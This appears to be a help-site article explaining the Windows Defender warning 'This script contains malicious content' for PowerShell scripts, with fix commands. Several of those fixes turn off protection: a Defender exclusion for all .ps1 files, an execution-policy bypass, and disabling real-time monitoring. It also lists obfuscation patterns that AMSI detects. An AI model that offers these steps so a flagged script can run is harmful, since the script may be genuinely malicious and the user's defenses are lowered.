Skip to content
Fix These Errors
This script contains malicious content

This script contains malicious content

DodaTech 3 min read

The “This script contains malicious content” warning means Windows Defender or another antivirus flagged your PowerShell script as potentially harmful code.

What It Means

PowerShell is a powerful automation platform that attackers frequently abuse to run malicious scripts. Security products like Microsoft Defender Antivirus use real-time behavior monitoring, AMSI (Anti-Malware Scan Interface), and signature-based detection to inspect PowerShell code before execution. When a script matches known malware patterns or exhibits suspicious behavior — such as obfuscated code, base64 decoding, or Win32 API calls — the security product blocks it.

Why It Happens

  • Windows Defender Real-Time Protection is active and flags the script.
  • The script uses AMSI-triggering patterns: -EncodedCommand, IEX, obfuscated strings.
  • The script was downloaded from the internet and is blocked by the Mark-of-the-Web.
  • The execution policy is set to Restricted or AllSigned and the script is unsigned.
  • The antivirus heuristic engine detects potentially unwanted software behavior.
  • The script is genuinely malicious or contains code that mimics known malware.

How to Fix It

1. Verify the script is safe 

# Check the script source and review the code
Get-Content .\script.ps1

# Scan with Microsoft Safety Scanner
Invoke-WebRequest -Uri "https://aka.ms/safety_scanner" -OutFile "MSERT.exe"

2. Unblock a downloaded script 

# Remove the Mark-of-the-Web
Unblock-File -Path .\script.ps1

3. Add an exclusion to Windows Defender 

# Add a folder exclusion (run as Administrator)
Add-MpPreference -ExclusionPath "C:\MyScripts"

# Add a file extension exclusion
Add-MpPreference -ExclusionExtension ".ps1"

4. Sign your script with a code-signing certificate 

# Create a self-signed certificate (for testing only)
$cert = New-SelfSignedCertificate -Subject "CN=MyScriptSigning" -Type CodeSigning

# Sign the script
Set-AuthenticodeSignature -FilePath .\script.ps1 -Certificate $cert

5. Bypass for immediate execution (use with caution) 

# Bypass execution policy for a single script
powershell.exe -ExecutionPolicy Bypass -File .\script.ps1

6. Temporarily disable real-time monitoring (admin only) 

# Temporarily disable (re-enables after reboot)
Set-MpPreference -DisableRealtimeMonitoring $true
Does execution policy prevent malicious scripts?
No — execution policy is not a security boundary. It prevents accidental execution but does not stop a determined attacker. Real protection comes from AMSI, Windows Defender, constrained language mode, and proper user account control. The execution policy is more of a “seat belt” than a “locked door.”
What is AMSI and how does it work in PowerShell?
AMSI (Anti-Malware Scan Interface) allows PowerShell to send script content to the installed antivirus product before execution. The antivirus inspects the script at the AST (Abstract Syntax Tree) level, detecting obfuscation and malicious patterns even if they are encoded or encrypted. AMSI cannot be disabled from within PowerShell — it runs at the system level.
How do I know if my script is really safe?
Review every line of code, especially any downloaded or copied snippets. Check for Invoke-Expression, Start-Process with suspicious arguments, encoded commands, or network connections to unknown hosts. When in doubt, run the script in a sandboxed virtual machine or Windows Sandbox first, and use -WhatIf flags in supported cmdlets to preview changes.
Previous The container name "/..." is already in use Next type mismatch; found: ... required: ...

Built by the developers of DodaTech

Doda Browser, DodaZIP & Durga Antivirus Pro

Home Browse Fix These Errors